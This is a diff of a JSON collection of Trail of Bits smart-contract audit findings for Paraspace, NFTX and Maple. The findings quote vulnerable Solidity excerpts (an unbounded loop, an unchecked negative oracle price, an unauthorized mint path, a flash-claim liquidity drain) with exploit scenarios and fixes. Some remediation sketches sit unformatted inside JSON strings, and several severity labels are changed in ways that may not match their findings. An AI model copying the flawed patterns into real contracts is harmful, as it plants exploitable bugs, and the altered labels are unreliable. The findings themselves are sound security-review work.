@@ "body": "The executeMintToTreasury function silently ignores non-ERC20 assets passed to it. Such behavior could allow erroneous calls to executeMintToTreasury to go unnoticed. The code for executeMintToTreasury appears in figure 5.1. It is called from the mintToTreasury function in PoolParameters.sol (figure 5.2). As shown in figure 5.1, non-ERC20 assets are silently skipped. function executeMintToTreasury( mapping(address => DataTypes.ReserveData) storage reservesData, address[] calldata assets ) external { for (uint256 i = 0; i < assets.length; i++) { address assetAddress = assets[i]; DataTypes.ReserveData storage reserve = reservesData[assetAddress]; DataTypes.ReserveConfigurationMap memory reserveConfiguration = reserve.configuration; // this cover both inactive reserves and invalid reserves since the flag will be 0 for both if ( !reserveConfiguration.getActive() || reserveConfiguration.getAssetType() != DataTypes.AssetType.ERC20 ) { continue; } ... } } Figure 5.1: contracts/protocol/libraries/logic/PoolLogic.sol#L98-L134 function mintToTreasury(address[] calldata assets) external virtual override nonReentrant { PoolLogic.executeMintToTreasury(_reserves, assets); } Figure 5.2: contracts/protocol/pool/PoolParameters.sol#L97-L104 Note that because this is a minting operation, it is likely meant to be called by an administrator. However, an administrator could pass a non-ERC20 asset in error. Because the function silently skips such assets, the error could go unnoticed.
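Per the short-term recommendation later in this finding, the silent continue could instead revert; a hedged sketch (AssetNotERC20 is a hypothetical error, and AssetType stands in for DataTypes.AssetType):

pragma solidity ^0.8.4;

library AssetTypeChecks {
    enum AssetType { ERC20, ERC721 } // stand-in for DataTypes.AssetType
    error AssetNotERC20(address asset); // hypothetical error type

    // Revert loudly instead of silently skipping non-ERC20 assets.
    function requireERC20(address asset, AssetType assetType) internal pure {
        if (assetType != AssetType.ERC20) revert AssetNotERC20(asset);
    }
}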
Exploit Scenario Alice, a Paraspace administrator, calls mintToTreasury with an array of assets. Alice accidentally sets one array element to an ERC721 asset. Alice's mistake is silently ignored by the on-chain code, and no error is reported. Recommendations Short term, have executeMintToTreasury revert when a non-ERC20 asset is passed to it. Doing so will ensure that callers are alerted to such errors. Long term, regularly review all conditionals involving asset types to verify that they handle all applicable asset types correctly. Doing so will help to identify problems involving the handling of different asset types.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" - ] - }, - { - "title": "7. Risk of denial of service due to unbounded loop ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "When protocol fees are distributed, the system loops through the list of beneficiaries (known internally as receivers) to send them the protocol fees they are entitled to. function distribute(uint256 vaultId) external override virtual nonReentrant { require(nftxVaultFactory != address(0)); address _vault = INFTXVaultFactory(nftxVaultFactory).vault(vaultId); uint256 tokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); if (distributionPaused || allocTotal == 0) { IERC20Upgradeable(_vault).safeTransfer(treasury, tokenBalance); return; } uint256 length = feeReceivers.length; uint256 leftover; for (uint256 i; i < length; ++i) { FeeReceiver memory _feeReceiver = feeReceivers[i]; uint256 amountToSend = leftover + ((tokenBalance * _feeReceiver.allocPoint) / allocTotal); uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); amountToSend = amountToSend > currentTokenBalance ? currentTokenBalance : amountToSend; bool complete = _sendForReceiver(_feeReceiver, vaultId, _vault, amountToSend); if (!complete) { uint256 remaining = IERC20Upgradeable(_vault).allowance(address(this), _feeReceiver.receiver); IERC20Upgradeable(_vault).safeApprove(_feeReceiver.receiver, 0); leftover = remaining; } else { leftover = 0; } } if (leftover != 0) { uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); IERC20Upgradeable(_vault).safeTransfer(treasury, currentTokenBalance); } } Figure 7.1: The distribute() function in NFTXSimpleFeeDistributor.sol Because this loop is unbounded and the number of receivers can grow, the amount of gas consumed is also unbounded. function _sendForReceiver(FeeReceiver memory _receiver, uint256 _vaultId, address _vault, uint256 amountToSend) internal virtual returns (bool) { if (_receiver.isContract) { IERC20Upgradeable(_vault).safeIncreaseAllowance(_receiver.receiver, amountToSend); bytes memory payload = abi.encodeWithSelector(INFTXLPStaking.receiveRewards.selector, _vaultId, amountToSend); (bool success, ) = address(_receiver.receiver).call(payload); // If the allowance has not been spent, it means we can pass it forward to next. return success && IERC20Upgradeable(_vault).allowance(address(this), _receiver.receiver) == 0; } else { IERC20Upgradeable(_vault).safeTransfer(_receiver.receiver, amountToSend); return true; } } Figure 7.2: The _sendForReceiver() function in NFTXSimpleFeeDistributor.sol Additionally, if one of the receivers is a contract, code that significantly increases the gas cost of the fee distribution will execute (figure 7.2).
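The long-term recommendation at the end of this finding suggests redesigning the mechanism; one common shape is a pull-based distribution, sketched here with hypothetical names and with access control deliberately omitted:

pragma solidity ^0.8.4;

interface IERC20Minimal {
    function transfer(address to, uint256 amount) external returns (bool);
}

// Hedged sketch of a pull-based alternative: fees are accrued per receiver,
// and each receiver withdraws its own share, so no user transaction ever
// iterates over the full receiver list.
contract PullFeeDistributor {
    IERC20Minimal public immutable vaultToken;
    mapping(address => uint256) public owed;

    constructor(IERC20Minimal vaultToken_) {
        vaultToken = vaultToken_;
    }

    // Called by the protocol to credit a receiver (accounting only).
    function accrue(address receiver, uint256 amount) external {
        owed[receiver] += amount; // access control omitted for brevity
    }

    // Each receiver pays the gas for its own withdrawal.
    function claim() external {
        uint256 amount = owed[msg.sender];
        owed[msg.sender] = 0;
        require(vaultToken.transfer(msg.sender, amount));
    }
}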
It is important to note that fees are usually distributed within the context of user transactions (redeeming, minting, etc.), so the total cost of the distribution operation depends on the logic outside of the distribute() function. Exploit Scenario The NFTX team adds a new feature that allows NFTX token holders who stake their tokens to register as receivers and gain a portion of protocol fees; because of that, the number of receivers grows dramatically. Due to the large number of receivers, the distribute() function cannot execute because the cost of executing it has reached the block gas limit. As a result, users are unable to mint, redeem, or swap tokens. Recommendations Short term, examine the execution cost of the function to determine the safe bounds of the loop and, if possible, consider splitting the distribution operation into multiple calls. Long term, consider redesigning the fee distribution mechanism to avoid unbounded loops and prevent denials of service. See appendix D for guidance on redesigning this mechanism.", - "labels": [ - "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: High" ] }, @@ -385,7 +355,7 @@ "body": "The getReservesData function fills in an AggregatedReserveData structure for the reserve handled by an IPoolAddressesProvider. However, the function does not set the structure's name and assetType fields. Therefore, off-chain code relying on this function will see uninitialized data. Part of the AggregatedReserveData structure appears in figure 6.1. The complete structure consists of 53 fields. Each iteration of the loop in getReservesData (figure 6.2) fills in the fields of one AggregatedReserveData structure. However, the loop does not set the structure's name fields. And although reserve assetTypes are computed, they are never stored in the structure. struct AggregatedReserveData { address underlyingAsset; string name; string symbol; ... //AssetType DataTypes.AssetType assetType; } Figure 6.1: contracts/ui/interfaces/IUiPoolDataProvider.sol#L18-L78 function getReservesData(IPoolAddressesProvider provider) public view override returns (AggregatedReserveData[] memory, BaseCurrencyInfo memory) { IParaSpaceOracle oracle = IParaSpaceOracle(provider.getPriceOracle()); IPool pool = IPool(provider.getPool()); address[] memory reserves = pool.getReservesList(); AggregatedReserveData[] memory reservesData = new AggregatedReserveData[](reserves.length); for (uint256 i = 0; i < reserves.length; i++) { ... DataTypes.AssetType assetType; ( reserveData.isActive, reserveData.isFrozen, reserveData.borrowingEnabled, reserveData.stableBorrowRateEnabled, isPaused, assetType ) = reserveConfigurationMap.getFlags(); ... } ... return (reservesData, baseCurrencyInfo); } Figure 6.2: contracts/ui/UiPoolDataProvider.sol#L83-L269 Exploit Scenario Alice writes off-chain code that calls getReservesData. Alice's code treats the returned name and assetType fields as if they have been properly filled in. Because these fields have not been set, Alice's code behaves incorrectly (e.g., by trying to transfer ERC721 tokens as though they were ERC20 tokens). Recommendations Short term, adjust getReservesData so that it sets the name and assetType fields. Doing so will help prevent off-chain code from receiving uninitialized data. Long term, test code that is meant to be called from off-chain to verify that every returned field is set.
Doing so can help to catch bugs like this one.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: High" ] }, @@ -406,7 +376,7 @@ "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -415,27 +385,7 @@ "body": "The _transferCollaterizable function mishandles the collaterizedBalance and _isUsedAsCollateral fields. At a minimum, this means that transferred tokens cannot be used as collateral. The code for _transferCollaterizable appears in figure 9.1. It is called from NToken._transfer (figure 9.2). The code decreases _userState[from].collaterizedBalance and clears _isUsedAsCollateral[tokenId]. However, the code does not make any corresponding changes, such as increasing _userState[to].collaterizedBalance and setting _isUsedAsCollateral[tokenId] elsewhere. As a result, if Alice transfers her NToken to Bob, Bob will not be able to use the corresponding ERC721 token as collateral. function _transferCollaterizable( address from, address to, uint256 tokenId ) internal virtual returns (bool isUsedAsCollateral_) { isUsedAsCollateral_ = _isUsedAsCollateral[tokenId]; if (from != to && isUsedAsCollateral_) { _userState[from].collaterizedBalance -= 1; delete _isUsedAsCollateral[tokenId]; } MintableIncentivizedERC721._transfer(from, to, tokenId); } Figure 9.1: contracts/protocol/tokenization/base/MintableIncentivizedERC721.sol#L643-L656 function _transfer( address from, address to, uint256 tokenId, bool validate ) internal { address underlyingAsset = _underlyingAsset; uint256 fromBalanceBefore = collaterizedBalanceOf(from); uint256 toBalanceBefore = collaterizedBalanceOf(to); bool isUsedAsCollateral = _transferCollaterizable(from, to, tokenId); ... } Figure 9.2: contracts/protocol/tokenization/NToken.sol#L300-L324 The code used to verify the bug appears in figure 9.3. The code first verifies that the collaterizedBalance and _isUsedAsCollateral fields are set correctly. It then has User 1 send his or her token to User 2, who sends it back to User 1. Finally, it verifies that the collaterizedBalance and _isUsedAsCollateral fields are set incorrectly. Most subsequent tests fail thereafter. it(\"User 1 sends the nToken to User 2, who sends it back to User 1\", async () => { const { nBAYC, users: [user1, user2], } = testEnv; expect(await nBAYC.isUsedAsCollateral(0)).to.be.equal(true); expect(await nBAYC.collaterizedBalanceOf(user1.address)).to.be.equal(1); expect(await nBAYC.collaterizedBalanceOf(user2.address)).to.be.equal(0); await nBAYC.connect(user1.signer).transferFrom(user1.address, user2.address, 0); await nBAYC.connect(user2.signer).transferFrom(user2.address, user1.address, 0); expect(await nBAYC.isUsedAsCollateral(0)).to.be.equal(false); expect(await nBAYC.collaterizedBalanceOf(user1.address)).to.be.equal(0); expect(await nBAYC.collaterizedBalanceOf(user2.address)).to.be.equal(0); }); it(\"User 2 deposits 10k DAI and User 1 borrows 8K DAI\", async () => { Figure 9.3: This is the code used to verify the bug. The highlighted line appears in the ntoken.spec.ts file. What precedes it was added to that file. Exploit Scenario Alice, a Paraspace user, maintains several accounts. Alice transfers an NToken from one of her accounts to another. She tries to borrow against the NToken's corresponding ERC721 token but is unable to. Alice misses a financial opportunity while trying to determine the source of the error. Recommendations Short term, implement one of the following two options: Correct the accounting errors in the code in figure 9.1.
(We experimented with this but were not able to determine all of the necessary changes.) Correcting the accounting errors will help ensure that users observe predictable behavior regarding NTokens. Disallow the transferring of assets that have been registered as collateral. If a user is to be surprised by her NToken's behavior, it is better that it happen sooner (when the user tries to transfer) than later (when the user tries to borrow). Long term, expand the tests in ntoken.spec.ts to include scenarios such as transferring NTokens among users. Including such tests could help to uncover similar bugs. Note that ntoken.spec.ts includes at least one broken test (figure 9.4). The token ID passed to nBAYC.transferFrom should be 0, not 1. Furthermore, the test checks for the wrong error message. It should be \"Health factor is lesser than the liquidation threshold\", not \"ERC721: operator query for nonexistent token\". it(\"User 1 tries to send the nToken to User 2 (should fail)\", async () => { const { nBAYC, users: [user1, user2], } = testEnv; await expect( nBAYC.connect(user1.signer).transferFrom(user1.address, user2.address, 1) ).to.be.revertedWith(\"ERC721: operator query for nonexistent token\"); }); Figure 9.4: test-suites/ntoken.spec.ts#L74-L83", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" - ] - }, - { - "title": "4. Incorrect GovernorshipAccepted event argument ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-maplefinance-mapleprotocolv2-securityreview.pdf", - "body": "The MapleGlobals contract emits the GovernorshipAccepted event with an incorrect previous owner value. MapleGlobals implements a two-step process for ownership transfer in which the current owner has to set the new governor, and then the new governor has to accept it. The acceptGovernor function first sets the new governor with _setAddress and then emits the GovernorshipAccepted event with the first argument defined as the old governor and the second the new one. However, because the admin() function returns the current value of the governor, both arguments will be the new governor. function acceptGovernor() external { require(msg.sender == pendingGovernor, \"MG:NOT_PENDING_GOVERNOR\"); _setAddress(ADMIN_SLOT, msg.sender); pendingGovernor = address(0); emit GovernorshipAccepted(admin(), msg.sender); } Figure 4.1: acceptGovernor function (globals-v2/contracts/MapleGlobals.sol#87-92) Exploit Scenario The Maple team decides to transfer the MapleGlobals governor to a new multi-signature wallet. The team has a script that verifies the correct execution by checking the events emitted; however, this script creates a false alert because the GovernorshipAccepted event does not have the expected arguments. Recommendations Short term, emit the GovernorshipAccepted event before calling _setAddress. Long term, add tests to check that the events have the expected arguments.", - "labels": [ - "Trail of Bits", - "Severity: Low", - "Difficulty: Low" - ] - }, - { - "title": "5. Partially incorrect Chainlink price feed safety checks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-maplefinance-mapleprotocolv2-securityreview.pdf", - "body": "The getLatestPrice function retrieves a specific asset price from Chainlink. However, the price (a signed integer) is checked only to be non-zero before it is cast to an unsigned integer, so a negative value would pass the check. An incorrect price would temporarily affect the expected amount of fund assets during liquidation.
function getLatestPrice(address asset_) external override view returns (uint256 latestPrice_) { // If governor has overridden price because of oracle outage, return overridden price. if (manualOverridePrice[asset_] != 0) return manualOverridePrice[asset_]; ( uint80 roundId_, int256 price_, , uint256 updatedAt_, uint80 answeredInRound_ ) = IChainlinkAggregatorV3Like(oracleFor[asset_]).latestRoundData(); require(updatedAt_ != 0, \"MG:GLP:ROUND_NOT_COMPLETE\"); require(answeredInRound_ >= roundId_, \"MG:GLP:STALE_DATA\"); require(price_ != int256(0), \"MG:GLP:ZERO_PRICE\"); latestPrice_ = uint256(price_); } Figure 5.1: getLatestPrice function (globals-v2/contracts/MapleGlobals.sol#297-308) Exploit Scenario Chainlink's oracle returns a negative value for an in-process liquidation. This value is then unsafely cast to a uint256. The expected amount of fund assets from the protocol is incorrect, which prevents liquidation. Recommendations Short term, check that the price is greater than 0. Long term, add tests for the Chainlink price feed with various edge cases. Additionally, set up a monitoring system in the event of unexpected market failures. A Chainlink oracle can have a minimum and maximum value, and if the real price is outside of that range, it will not be possible to update the oracle; as a result, it will report an incorrect price, and it will be impossible to know this on-chain.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, @@ -445,7 +395,7 @@ "body": "The IPriceOracle interface is used only in tests, yet it appears alongside production code. Its location increases the risk that a developer will try to use it in production code. The complete interface appears in figure 10.1. Note that the interface includes code that a real oracle is unlikely to include, such as the setAssetPrice function. Therefore, a developer who calls this function would likely introduce a bug into the code. // SPDX-License-Identifier: AGPL-3.0 pragma solidity 0.8.10; /** * @title IPriceOracle * * @notice Defines the basic interface for a Price oracle. **/ interface IPriceOracle { /** * @notice Returns the asset price in the base currency * @param asset The address of the asset * @return The price of the asset **/ function getAssetPrice(address asset) external view returns (uint256); /** * @notice Set the price of the asset * @param asset The address of the asset * @param price The price of the asset **/ function setAssetPrice(address asset, uint256 price) external; } Figure 10.1: contracts/interfaces/IPriceOracle.sol Exploit Scenario Alice, a Paraspace developer, uses the IPriceOracle interface in production code. Alice's contract tries to call the setAssetPrice method. When the vulnerable code path is exercised, Alice's contract reverts unexpectedly. Recommendations Short term, move IPriceOracle.sol to a location that makes it clear that it should be used in testing code only. Adjust all references to the file accordingly. Doing so will reduce the risk that the file is used in production code. Long term, as new code is added to the codebase, maintain segregation between production and testing code. Testing code is typically not held to the same standards as production code.
Calling testing code from production code could introduce bugs.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, @@ -455,7 +405,7 @@ "body": "The PoolCore contract has an external function supplyERC721FromNToken, whose purpose is to validate that the given ERC721 assets are owned by the NToken contract and then to mint the corresponding NTokens to a caller-supplied address. We suspect that the intended use case for this function is that the NTokenMoonBirds or UniswapV3Gateway contract will transfer the ERC721 assets to the NToken contract and then immediately call supplyERC721FromNToken. However, the access controls on this function allow an unauthorized user to take ownership of any assets manually transferred to the NToken contract, for whatever reason that may be, as NToken does not track the original owner of the asset. function supplyERC721FromNToken( address asset, DataTypes.ERC721SupplyParams[] calldata tokenData, address onBehalfOf ) external virtual override nonReentrant { SupplyLogic.executeSupplyERC721FromNToken( // ... ); } Figure 11.1: The external supplyERC721FromNToken function within PoolCore function validateSupplyFromNToken( DataTypes.ReserveCache memory reserveCache, DataTypes.ExecuteSupplyERC721Params memory params, DataTypes.AssetType assetType ) internal view { // ... for (uint256 index = 0; index < amount; index++) { // validate that the owner of the underlying asset is the NToken contract require( IERC721(params.asset).ownerOf( params.tokenData[index].tokenId ) == reserveCache.xTokenAddress, Errors.NOT_THE_OWNER ); // validate that the owner of the ntoken that has the same tokenId is the zero address require( IERC721(reserveCache.xTokenAddress).ownerOf( params.tokenData[index].tokenId ) == address(0x0), Errors.NOT_THE_OWNER ); } } Figure 11.2: The validation checks performed by supplyERC721FromNToken function executeSupplyERC721Base( uint16 reserveId, address nTokenAddress, DataTypes.UserConfigurationMap storage userConfig, DataTypes.ExecuteSupplyERC721Params memory params ) internal { // ... bool isFirstCollaterarized = INToken(nTokenAddress).mint( params.onBehalfOf, params.tokenData ); // ... } Figure 11.3: The unauthorized minting operation Users regularly interact with the NToken contract, which represents ERC721 assets, so it is possible that a malicious actor could convince users to transfer their ERC721 assets to the contract in an unintended manner. Exploit Scenario Alice, an unaware owner of some ERC721 assets, is convinced to transfer her assets to the NToken contract (or transfers them of her own accord, unaware that she should not). A malicious third party mints NTokens from Alice's assets and withdraws them to his own account. Recommendations Short term, document the purpose and use of the NToken contract to ensure that users are unambiguously aware that ERC721 tokens are not meant to be sent directly to the NToken contract. Long term, consider whether supplyERC721FromNToken should have more access controls around it. Additional access controls could prevent attackers from taking ownership of any incorrectly transferred asset. In particular, this function is called from only two locations, so a msg.sender whitelist could be sufficient.
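A hedged sketch of such a whitelist (names are hypothetical; how the mapping is populated, e.g., by governance, is out of scope):

pragma solidity ^0.8.4;

error CallerNotAllowed(address caller); // hypothetical error type

// Minimal msg.sender whitelist, as the recommendation above describes.
abstract contract CallerWhitelist {
    mapping(address => bool) public allowedCallers;

    modifier onlyAllowedCaller() {
        if (!allowedCallers[msg.sender]) revert CallerNotAllowed(msg.sender);
        _;
    }
}

Under this sketch, supplyERC721FromNToken would add the onlyAllowedCaller modifier, with only the two expected callers whitelisted.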
Additionally, if possible, consider adding additional metadata to the contract to track the original owner of ERC721 assets, and consider providing a mechanism for transferring any asset without a corresponding NToken back to the original owner.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: Low" ] }, @@ -465,17 +415,7 @@ "body": "When a user liquidates another user's ERC20 tokens and opts to receive PTokens, the PTokens are automatically registered as collateral. However, when a user liquidates another user's ERC721 token and opts to receive an NToken, the NToken is not automatically registered as collateral. This discrepancy could be confusing for users. The relevant code appears in figures 12.1 through 12.3. For ERC20 tokens, _liquidatePTokens is called, which in turn calls setUsingAsCollateral if the liquidator has not already designated the PTokens as collateral (figures 12.1 and 12.2). However, for an ERC721 token, the NToken is simply transferred (figure 12.3). if (params.receiveXToken) { _liquidatePTokens(usersConfig, collateralReserve, params, vars); } else { Figure 12.1: contracts/protocol/libraries/logic/LiquidationLogic.sol#L310-L312 function _liquidatePTokens( mapping(address => DataTypes.UserConfigurationMap) storage usersConfig, DataTypes.ReserveData storage collateralReserve, DataTypes.ExecuteLiquidationCallParams memory params, LiquidationCallLocalVars memory vars ) internal { ... if (liquidatorPreviousPTokenBalance == 0) { DataTypes.UserConfigurationMap storage liquidatorConfig = usersConfig[vars.liquidator]; liquidatorConfig.setUsingAsCollateral(collateralReserve.id, true); emit ReserveUsedAsCollateralEnabled( params.collateralAsset, vars.liquidator ); } } Figure 12.2: contracts/protocol/libraries/logic/LiquidationLogic.sol#L667-L693 if (params.receiveXToken) { INToken(vars.collateralXToken).transferOnLiquidation( params.user, vars.liquidator, params.collateralTokenId ); } else { Figure 12.3: contracts/protocol/libraries/logic/LiquidationLogic.sol#L562-L568 Exploit Scenario Alice, a Paraspace user, liquidates several ERC721 tokens. Alice comes to expect that received NTokens are not designated as collateral. Eventually, Alice liquidates another user's ERC20 tokens and opts to receive PTokens. Bob liquidates Alice's PTokens, and Alice loses the underlying ERC20 tokens as a result. Recommendations Short term, conspicuously document the fact that PToken and NToken liquidations behave differently. Doing so will reduce the likelihood that users will be surprised by the inconsistency. Long term, consider whether the behavior should be made consistent. That is, decide whether NTokens and PTokens should be automatically collateralized on liquidation, and implement such behavior for both types of tokens. A consistent API is less likely to be a source of errors.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" - ] - }, - { - "title": "9. Attackers can prevent the pool manager from finishing liquidation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-maplefinance-mapleprotocolv2-securityreview.pdf", - "body": "The finishCollateralLiquidation function requires that a liquidation is no longer active. However, an attacker can prevent the liquidation from finishing by sending a minimal amount of collateral token to the liquidator address.
function finishCollateralLiquidation(address loan_) external override nonReentrant returns (uint256 remainingLosses_, uint256 platformFees_) { require(msg.sender == poolManager, \"LM:FCL:NOT_POOL_MANAGER\"); require(!isLiquidationActive(loan_), \"LM:FCL:LIQ_STILL_ACTIVE\"); [...] if (toTreasury_ != 0) ILiquidatorLike(liquidationInfo_.liquidator).pullFunds(fundsAsset, mapleTreasury(), toTreasury_); if (toPool_ != 0) ILiquidatorLike(liquidationInfo_.liquidator).pullFunds(fundsAsset, pool, toPool_); if (recoveredFunds_ != 0) ILiquidatorLike(liquidationInfo_.liquidator).pullFunds(fundsAsset, ILoanLike(loan_).borrower(), recoveredFunds_); Figure 9.1: An excerpt of the finishCollateralLiquidation function (pool-v2/contracts/LoanManager.sol#L199-L232) The finishCollateralLiquidation function uses the isLiquidationActive function to verify if the liquidation process is finished by checking the collateral asset balance of the liquidator address. Because anyone can send tokens to that address, it is possible to make isLiquidationActive always return true. function isLiquidationActive(address loan_) public view override returns (bool isActive_) { address liquidatorAddress_ = liquidationInfo[loan_].liquidator; // TODO: Investigate dust collateralAsset will ensure `isLiquidationActive` is always true. isActive_ = (liquidatorAddress_ != address(0)) && (IERC20Like(ILoanLike(loan_).collateralAsset()).balanceOf(liquidatorAddress_) != uint256(0)); } Figure 9.2: The isLiquidationActive function (pool-v2/contracts/LoanManager.sol#L702-L707) Exploit Scenario Alice's loan is being liquidated. Bob, the pool manager, tries to call finishCollateralLiquidation to get back the recovered funds. Eve front-runs Bob's call by sending 1 token of the collateral asset to the liquidator address. As a consequence, Bob cannot recover the funds. Recommendations Short term, use a storage variable to track the remaining collateral in the Liquidator contract. As a result, the collateral balance cannot be manipulated through the transfer of tokens and can be safely checked in isLiquidationActive (a hedged sketch appears below). Long term, avoid using exact comparisons for ether and token balances, as users can increase those balances by executing transfers, making the comparisons evaluate to false.", - "labels": [ - "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: High" ] }, @@ -485,7 +425,7 @@ "body": "Some validation functions involving assets do not check the given asset's type. Such checks should be added to ensure defense in depth. The validateRepay function is one example (figure 13.1). The function performs several checks involving the asset being repaid, but the function does not check that the asset is an ERC20 asset. function validateRepay( DataTypes.ReserveCache memory reserveCache, uint256 amountSent, DataTypes.InterestRateMode interestRateMode, address onBehalfOf, uint256 stableDebt, uint256 variableDebt ) internal view { ... (bool isActive, , , , bool isPaused, ) = reserveCache .reserveConfiguration .getFlags(); require(isActive, Errors.RESERVE_INACTIVE); require(!isPaused, Errors.RESERVE_PAUSED); ... } Figure 13.1: contracts/protocol/libraries/logic/ValidationLogic.sol#L403-L447 Another example is the validateFlashloanSimple function, which does not check that the loaned asset is an ERC20 asset. We do not believe that the absence of these checks currently represents a vulnerability. However, adding these checks will help protect the code against future modifications.
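Referring back to the isLiquidationActive finding above, a hedged sketch of tracking remaining collateral in storage rather than via balanceOf, so that dust transfers cannot keep a liquidation alive (names are hypothetical):

pragma solidity ^0.8.4;

// Hedged sketch: the liquidator tracks how much collateral it still holds in
// a storage variable, updated only by its own logic, so attacker-sent dust
// does not affect the activity check.
contract LiquidatorAccounting {
    uint256 public collateralRemaining;

    function _onCollateralReceived(uint256 amount) internal {
        collateralRemaining += amount;
    }

    function _onCollateralSold(uint256 amount) internal {
        collateralRemaining -= amount;
    }

    function isLiquidationActive() public view returns (bool) {
        return collateralRemaining != 0;
    }
}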
Exploit Scenario Alice, a Paraspace developer, implements a feature allowing users to flash loan ERC721 tokens to other users in exchange for a fee. Alice uses the validateFlashloanSimple function as a template for implementing the new validation code. Therefore, Alice's additions lack a check that the loaned assets are actually ERC721 assets. Some users lose ERC20 tokens as a result. Recommendations Short term, ensure that each validation function involving assets verifies the type of the asset involved. Doing so will help protect the code against future modifications. Long term, regularly review all conditionals involving asset types to verify that they handle all applicable asset types correctly. Doing so will help to identify problems involving the handling of different asset types.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, @@ -495,8 +435,8 @@ "body": "Flash claims enable users with collateralized NFTs to assume ownership of the underlying asset for the duration of a single transaction, with the condition that the NFT be returned at the end of the transaction. When used with typical NFTs, such as Bored Ape Yacht Club tokens, the atomic nature of flash claims prevents users from removing net value from the Paraspace contract while enabling them to claim rewards, such as airdrops, that they are entitled to by virtue of owning the NFTs. Uniswap v3 NFTs represent a position in a Uniswap liquidity pool and entitle the owner to add or withdraw liquidity from the underlying Uniswap position. Uniswap v3 NFT prices are determined by summing the value of the two ERC20 tokens deposited as liquidity in the underlying position. Normally, when a Uniswap NFT is deposited in the Uniswap NToken contract, the user can withdraw liquidity only if the resulting price leaves the user's health factor above one. However, by leveraging the flash claim system, a user could claim the Uniswap v3 NFT temporarily and withdraw liquidity directly, returning a valueless NFT. As currently implemented, Paraspace is not vulnerable to this attack because Uniswap v3 flash claims are, apparently accidentally, nonfunctional. A check in the onERC721Received function of the NTokenUniswapV3 contract, which is designed to prevent users from depositing Uniswap positions via the supplyERC721 method, incidentally prevents Uniswap NFTs from being returned to the contract during the flash claim process. However, this check could be removed in future updates and occurs at the very last step in what would otherwise be a successful exploit. function onERC721Received( address operator, address, uint256 id, bytes memory ) external virtual override returns (bytes4) { // ... // if the operator is the pool, this means that the pool is transferring the token to this contract // which can happen during a normal supplyERC721 pool tx if (operator == address(POOL)) { revert(Errors.OPERATION_NOT_SUPPORTED); } Figure 14.1: The failing check that prevents the completion of Uniswap v3 flash claims Exploit Scenario Alice, a Paraspace developer, decides to move the check that prevents users from depositing Uniswap v3 NFTs via the supplyERC721 method out of the onERC721Received function and into the Paraspace Pool contract. She thus unwittingly enables flash claims for Uniswap v3 positions. Bob, a malicious actor, then deposits a Uniswap NFT worth 100 ETH and borrows 30 ETH against it. Bob flash claims the NFT and withdraws the 100 ETH of liquidity, leaving a worthless NFT as collateral and taking the 30 ETH as profit.
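Anticipating the long-term recommendation that follows, a hedged sketch of re-checking the claimer's health factor after the flash-claimed NFT is returned (the pool accessor and threshold are assumptions, loosely modeled on Aave-style pools):

pragma solidity ^0.8.4;

interface IPoolHealth {
    // Assumed accessor; the real pool may expose this differently.
    function getUserHealthFactor(address user) external view returns (uint256);
}

error HealthFactorTooLow(); // hypothetical error type

uint256 constant HEALTH_FACTOR_THRESHOLD = 1e18; // assumed 1.0 in wad units

// Re-check collateralization after the return phase of a flash claim.
function assertHealthyAfterFlashClaim(IPoolHealth pool, address claimer) view {
    if (pool.getUserHealthFactor(claimer) < HEALTH_FACTOR_THRESHOLD) {
        revert HealthFactorTooLow();
    }
}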
Recommendations Short term, disable Uniswap v3 NFT flash claims explicitly by requiring in ValidationLogic.validateFlashClaim that the flash-claimed NFT not be atomically priced. Long term, consider adding a user healthFactor check after the return phase of the flash claim process to ensure that users cannot become undercollateralized as a result of flash claims.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: High" + "Severity: High", + "Difficulty: Low" ] }, { @@ -505,17 +445,47 @@ "body": "As part of the flash claim functionality, Paraspace provides an implementation of a contract that can claim airdrops on behalf of NFT holders. This contract tracks claimed airdrops in the airdropClaimRecords mapping, indexed by the result of the getClaimKeyHash function. However, it is possible for two different inputs to getClaimKeyHash to result in identical hashes through a collision in the unpacked encoding. Because nftTokenIds and params are both variable-length inputs, an input with nftTokenIds equal to uint256(1) and an empty params will hash to the same value as an input with an empty nftTokenIds and params equal to uint256(1). Although the airdropClaimRecords mapping is not read or otherwise referenced elsewhere in the code, collisions may cause off-chain clients to mistakenly believe that an unclaimed airdrop has already been claimed. function getClaimKeyHash( address initiator, address nftAsset, uint256[] calldata nftTokenIds, bytes calldata params ) public pure returns (bytes32) { return keccak256( abi.encodePacked(initiator, nftAsset, nftTokenIds, params) ); } Figure 15.1: contracts/misc/flashclaim/AirdropFlashClaimReceiver.sol#L247-L257 Exploit Scenario Paraspace develops an off-chain tool to help users automatically claim airdrops for their NFTs. By chance or through malfeasance, two different airdrop claim operations for the same nftAsset result in the same claimKeyHash. The tool then mistakenly believes that it has claimed both airdrops when, in reality, it claimed only one. Recommendations Short term, encode the input to keccak256 using abi.encode in order to preserve boundaries between inputs. Long term, consider using an EIP-712 compatible structured hash encoding with domain separation wherever hashes will be used as unique identifiers or signed messages.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, + { + "title": "1. Attacker can prevent L2 transactions from being added to a block ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-securityreview.pdf", + "body": "The commitTransactions function returns a flag that determines whether to halt transaction production, even if the block has room for more 